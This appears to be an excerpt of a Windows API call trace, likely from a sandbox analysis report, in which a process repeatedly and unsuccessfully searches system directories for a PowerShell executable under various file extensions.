	[0758.128] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.128] SetErrorMode (uMode=0x1) returned 0x1
	[0758.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.129] SetErrorMode (uMode=0x1) returned 0x1
	[0758.129] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.129] SetErrorMode (uMode=0x1) returned 0x1
	[0758.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.129] SetErrorMode (uMode=0x1) returned 0x1
	[0758.129] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.130] SetErrorMode (uMode=0x1) returned 0x1
	[0758.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.130] SetErrorMode (uMode=0x1) returned 0x1
	[0758.130] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.130] SetErrorMode (uMode=0x1) returned 0x1
	[0758.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.131] SetErrorMode (uMode=0x1) returned 0x1
	[0758.131] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.131] SetErrorMode (uMode=0x1) returned 0x1
	[0758.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.131] SetErrorMode (uMode=0x1) returned 0x1
	[0758.131] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.132] SetErrorMode (uMode=0x1) returned 0x1
	[0758.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.132] SetErrorMode (uMode=0x1) returned 0x1
	[0758.132] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.133] SetErrorMode (uMode=0x1) returned 0x1
	[0758.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.133] SetErrorMode (uMode=0x1) returned 0x1
	[0758.133] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.133] SetErrorMode (uMode=0x1) returned 0x1
	[0758.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.134] SetErrorMode (uMode=0x1) returned 0x1
	[0758.134] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.134] SetErrorMode (uMode=0x1) returned 0x1
	[0758.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.134] SetErrorMode (uMode=0x1) returned 0x1
	[0758.134] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.135] SetErrorMode (uMode=0x1) returned 0x1
	[0758.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.135] SetErrorMode (uMode=0x1) returned 0x1
	[0758.135] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.135] SetErrorMode (uMode=0x1) returned 0x1
	[0758.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.136] SetErrorMode (uMode=0x1) returned 0x1
	[0758.136] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.136] SetErrorMode (uMode=0x1) returned 0x1
	[0758.136] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.136] SetErrorMode (uMode=0x1) returned 0x1
	[0758.137] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.137] SetErrorMode (uMode=0x1) returned 0x1
	[0758.137] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.137] SetErrorMode (uMode=0x1) returned 0x1
	[0758.137] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.138] SetErrorMode (uMode=0x1) returned 0x1
	[0758.138] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.138] SetErrorMode (uMode=0x1) returned 0x1
	[0758.138] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.138] SetErrorMode (uMode=0x1) returned 0x1
	[0758.138] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.139] SetErrorMode (uMode=0x1) returned 0x1
	[0758.139] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.139] SetErrorMode (uMode=0x1) returned 0x1
	[0758.139] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.139] SetErrorMode (uMode=0x1) returned 0x1
	[0758.139] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.140] SetErrorMode (uMode=0x1) returned 0x1
	[0758.140] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.140] SetErrorMode (uMode=0x1) returned 0x1
	[0758.140] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.140] SetErrorMode (uMode=0x1) returned 0x1
	[0758.141] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.141] SetErrorMode (uMode=0x1) returned 0x1
	[0758.141] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.141] SetErrorMode (uMode=0x1) returned 0x1
	[0758.141] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.141] SetErrorMode (uMode=0x1) returned 0x1
	[0758.141] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.142] SetErrorMode (uMode=0x1) returned 0x1
	[0758.142] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.142] SetErrorMode (uMode=0x1) returned 0x1
	[0758.142] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.142] SetErrorMode (uMode=0x1) returned 0x1
	[0758.143] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.143] SetErrorMode (uMode=0x1) returned 0x1
	[0758.143] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.143] SetErrorMode (uMode=0x1) returned 0x1
	[0758.143] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.144] SetErrorMode (uMode=0x1) returned 0x1
	[0758.144] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.144] SetErrorMode (uMode=0x1) returned 0x1
	[0758.144] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.144] SetErrorMode (uMode=0x1) returned 0x1
	[0758.144] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.145] SetErrorMode (uMode=0x1) returned 0x1
	[0758.145] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.145] SetErrorMode (uMode=0x1) returned 0x1
	[0758.145] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.145] SetErrorMode (uMode=0x1) returned 0x1
	[0758.146] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.146] SetErrorMode (uMode=0x1) returned 0x1
	[0758.146] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.146] SetErrorMode (uMode=0x1) returned 0x1
	[0758.146] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0758.147] SetErrorMode (uMode=0x1) returned 0x1
	[0758.147] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.147] SetErrorMode (uMode=0x1) returned 0x1
	[0759.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.390] SetErrorMode (uMode=0x1) returned 0x1
	[0759.390] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.390] SetErrorMode (uMode=0x1) returned 0x1
	[0759.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.391] SetErrorMode (uMode=0x1) returned 0x1
	[0759.391] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.391] SetErrorMode (uMode=0x1) returned 0x1
	[0759.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.391] SetErrorMode (uMode=0x1) returned 0x1
	[0759.391] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.392] SetErrorMode (uMode=0x1) returned 0x1
	[0759.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.392] SetErrorMode (uMode=0x1) returned 0x1
	[0759.392] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.392] SetErrorMode (uMode=0x1) returned 0x1
	[0759.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.393] SetErrorMode (uMode=0x1) returned 0x1
